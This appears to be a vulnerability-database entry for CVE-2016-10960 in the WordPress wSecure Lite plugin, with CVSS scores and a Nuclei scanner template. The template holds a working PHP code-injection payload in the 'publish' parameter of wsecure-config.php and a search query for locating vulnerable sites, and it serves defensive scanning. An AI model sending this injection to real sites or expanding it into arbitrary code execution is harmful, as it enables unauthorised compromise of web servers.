Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-10960
HistoryJul 15, 2021 - 2:41 a.m.

WordPress wSecure Lite < 2.4 - Remote Code Execution

2021-07-1502:41:14
ProjectDiscovery
github.com
34
wordpress
wsecure
remote code execution
joomlaserviceprovider
vulnerability

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS

0.02

Percentile

88.9%

WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.

id: CVE-2016-10960

info:
  name: WordPress wSecure Lite < 2.4 - Remote Code Execution
  author: daffainfo
  severity: high
  description: WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
  remediation: |
    Update to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability.
  reference:
    - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
    - https://wordpress.org/plugins/wsecure/#developers
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2016-10960
    cwe-id: CWE-20
    epss-score: 0.01469
    epss-percentile: 0.86457
    cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:*
  metadata:
    max-request: 1
    vendor: joomlaserviceprovider
    product: wsecure
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wsecure"
  tags: cve2016,cve,wordpress,wp-plugin,rce,joomlaserviceprovider
variables:
  name: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"

    body: 'wsecure_action=update&publish=";} header("{{name}}: CVE-2016-10960"); class WSecureConfig2 {var $test="'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "{{name}}: CVE-2016-10960"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022028547f88cd5ee6349b8fce17ed0c1ebb51aaccf87c6ebb245512f16a9b0976f2022100a8c2ef6ffcfe5bd3d42a7330cbf6d03b61b9ff919f463b7838a8db77a1502946:922c64590222798bb761d5b6d8e72950

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS

0.02

Percentile

88.9%

Related for NUCLEI:CVE-2016-10960